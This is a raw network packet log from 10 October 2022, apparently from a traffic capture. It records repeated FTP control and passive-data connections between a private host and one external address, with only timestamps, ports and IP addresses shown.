                                                                                                                                    Oct 10, 2022 06:03:23.957035065 CEST4997064670192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.957230091 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.957330942 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.957468033 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.981637955 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.981690884 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.981785059 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.168229103 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.193008900 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.193219900 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.220746994 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.221036911 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.221683025 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.221776009 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.222358942 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.222425938 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.232815027 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.256970882 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.257093906 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.259308100 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.283981085 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.284192085 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.285959959 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.312901974 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.313194990 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.770590067 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.795586109 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.795701981 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.829042912 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.853918076 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.854140043 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.855700016 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.880409002 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.880505085 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.881434917 CEST4997264671192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.904726028 CEST6467149972185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.905041933 CEST4997264671192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.940987110 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.966444016 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.966619968 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.972372055 CEST4997264671192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.995692968 CEST6467149972185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.995917082 CEST6467149972185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.995986938 CEST4997264671192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.997550964 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:24.997677088 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:24.997839928 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.023433924 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.024071932 CEST2149971185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.024432898 CEST4997121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.300925970 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.326064110 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.326385975 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.357455969 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.357522011 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.357554913 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.357753992 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.357753992 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.418010950 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:25.443339109 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:25.443613052 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.207866907 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.233076096 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.233215094 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.286676884 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.314212084 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.314466953 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.317600965 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.345472097 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.345590115 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.346666098 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.373194933 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.373384953 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.375294924 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.401375055 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.401498079 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.401736021 CEST4997464673192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.424529076 CEST6467349974185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.424642086 CEST4997464673192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.424936056 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.452024937 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.452174902 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.452783108 CEST4997464673192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.475223064 CEST6467349974185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.475528955 CEST6467349974185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.475594997 CEST4997464673192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.477258921 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.478769064 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.478769064 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.503827095 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.504172087 CEST2149973185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.504268885 CEST4997321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.619452000 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.642601967 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.642827034 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.670505047 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.670559883 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.670589924 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.670752048 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.670968056 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.694307089 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.694576979 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.694798946 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.718581915 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.718866110 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.719007015 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.742371082 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.742611885 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.742863894 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.766406059 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.766844034 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.767862082 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.791060925 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.791390896 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.793870926 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.817562103 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.817881107 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.818533897 CEST4997664674192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.841677904 CEST6467449976185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.841891050 CEST4997664674192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.842428923 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.866976976 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.867192984 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.867837906 CEST4997664674192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.890749931 CEST6467449976185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.890834093 CEST6467449976185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.891082048 CEST4997664674192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.891618967 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.891715050 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.896297932 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:26.919295073 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.920696020 CEST2149975185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:26.920789957 CEST4997521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.039330959 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.064023972 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.064291954 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.093449116 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.093477964 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.093494892 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.093673944 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.093898058 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.118732929 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.118961096 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.119225979 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.144547939 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.144785881 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.144942999 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.171174049 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.171320915 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.171497107 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.197722912 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.197942019 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.198394060 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.223479033 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.223730087 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.225058079 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.251276016 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.251529932 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.252130032 CEST4997864675192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.274769068 CEST6467549978185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.274898052 CEST4997864675192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.275631905 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.301757097 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.301887035 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.303040028 CEST4997864675192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.325525999 CEST6467549978185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.328320980 CEST6467549978185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.328469992 CEST4997864675192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.330579996 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.330730915 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.331104040 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.355145931 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.355359077 CEST2149977185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.355555058 CEST4997721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.475332022 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.498315096 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.498769999 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.524452925 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.524494886 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.524523973 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.524730921 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.524946928 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.547682047 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.548023939 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.548260927 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.570975065 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.571367025 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.571702957 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.594568968 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.594928980 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.597465992 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.620841026 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.621210098 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.621778011 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.644645929 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.645066977 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.647558928 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.671118021 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.671443939 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.672255039 CEST4998064676192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.695981979 CEST6467649980185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.696197033 CEST4998064676192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.696753025 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.720038891 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.720371962 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.721146107 CEST4998064676192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.744437933 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.744848967 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.745012045 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.745070934 CEST6467649980185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.746659994 CEST6467649980185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.746774912 CEST4998064676192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.767407894 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.767461061 CEST2149979185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.767699003 CEST4997921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.881818056 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.906135082 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.906377077 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.935375929 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.935491085 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.935543060 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.935631990 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.935672998 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.936119080 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.959975958 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.960225105 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.960380077 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.983946085 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:27.984159946 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:27.984401941 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.008661032 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.009097099 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.009202003 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.033431053 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.033546925 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.033993006 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.058278084 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.058368921 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.059365988 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.083292007 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.083478928 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.083712101 CEST4998264677192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.107464075 CEST6467749982185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.107680082 CEST4998264677192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.108174086 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.134465933 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.134680986 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.135375023 CEST4998264677192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.158740044 CEST6467749982185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.159193039 CEST6467749982185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.159387112 CEST4998264677192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.159775019 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.159930944 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.161147118 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.186501026 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.186594009 CEST2149981185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.186858892 CEST4998121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.282655954 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.310534954 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.310923100 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.342803955 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.342866898 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.343038082 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.343144894 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.343206882 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.344149113 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.370106936 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.370214939 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.370412111 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.396414042 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.396673918 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.396900892 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.424839973 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.425030947 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.427968025 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.455564976 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.455759048 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.461968899 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.490115881 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.490346909 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.492075920 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.521893978 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.522234917 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.522602081 CEST4998464678192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.547204018 CEST6467849984185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.547382116 CEST4998464678192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.547952890 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.575576067 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.575669050 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.576309919 CEST4998464678192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.601655960 CEST6467849984185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.601727962 CEST6467849984185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.601857901 CEST4998464678192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.601891041 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.601968050 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.604373932 CEST4998321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.631150961 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.631206989 CEST2149983185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.631406069 CEST4998321192.168.2.3185.106.92.60
